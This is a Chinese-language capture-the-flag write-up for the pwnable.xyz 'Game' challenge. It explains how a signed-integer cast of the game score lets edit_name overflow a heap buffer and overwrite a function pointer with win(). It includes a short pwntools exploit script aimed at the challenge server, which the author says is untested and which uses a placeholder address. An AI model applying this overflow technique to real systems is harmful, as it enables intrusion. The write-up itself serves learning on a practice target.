Pwnable.xyz Game

0x1,概述。

这道题漏洞主要在于函数save_game函数的有符号整形使edit_name对名字长度误判导致的溢出,仔细观察save_game函数对数字格式的转换再结合堆结构可以直接发现。

0x2,具体解决方案。

先查一波保护:

Pwnable.xyz Game

 具体逻辑分析:

Pwnable.xyz Game

 main()通过菜单选择行为,并回应。

Pwnable.xyz Game

 Play game 通过指针cur+3 实现。

关键就在于save_game():

Pwnable.xyz Game

之前init_game()函数分配0x20于save[0],分配0x10字节于*cur[0]存放初始name。

这里又分配0x20内存于save[1]存放第一个分数。

 之后分析play_game()可知我们的分数保存在*cur[1]且类型为word,但在这里18行将其强制转型为有符号int并储存在save[1]。再来看一下堆的情况:

Pwnable.xyz Game

 

由于malloc()函数连续调用,导致cur[0]和save[0]以及save[1]内存块地址连续,当我们分数为-1时,有符号数0xffffff强制转型为qword:

Pwnable.xyz Game 

edit_game()单纯测量cur(0x6032a0)长度并决定可输入字符数量.

 Pwnable.xyz Game

 理论我们只能对cur地址进行不超过0x10字节的输入,但只要不存在/x00,strlen()函数就继续计算字符串长度,这就意味着我们可以控制额外8字符。

即可以控制play_game()调用,修改其地址为win()。

shellcode:

from pwn import * 
#Python 3.9.9

sh = remote("svc.pwnable.xyz",30009)

sh.sendafter("Name: ","A" * 0x10)
sh.sendlineafter("> ","1")
sh.sendlineafter("= ","17")
sh.sendlineafter("> ","2")
sh.sendlineafter("> ","3")
sh.send(b'A' * 0x10 + p64(Address_of_win))
sh.sendlineafter("> ","1")
print(sh.recv())

代码未经测试,仅供参考。

0x3,总结。

这题也不难,仔细审计代码和数据结构是关键。

上一篇:启明云端分享:2.4寸磁编码旋钮屏的妙用~


下一篇:PCL:SIFT特征点估计(法线)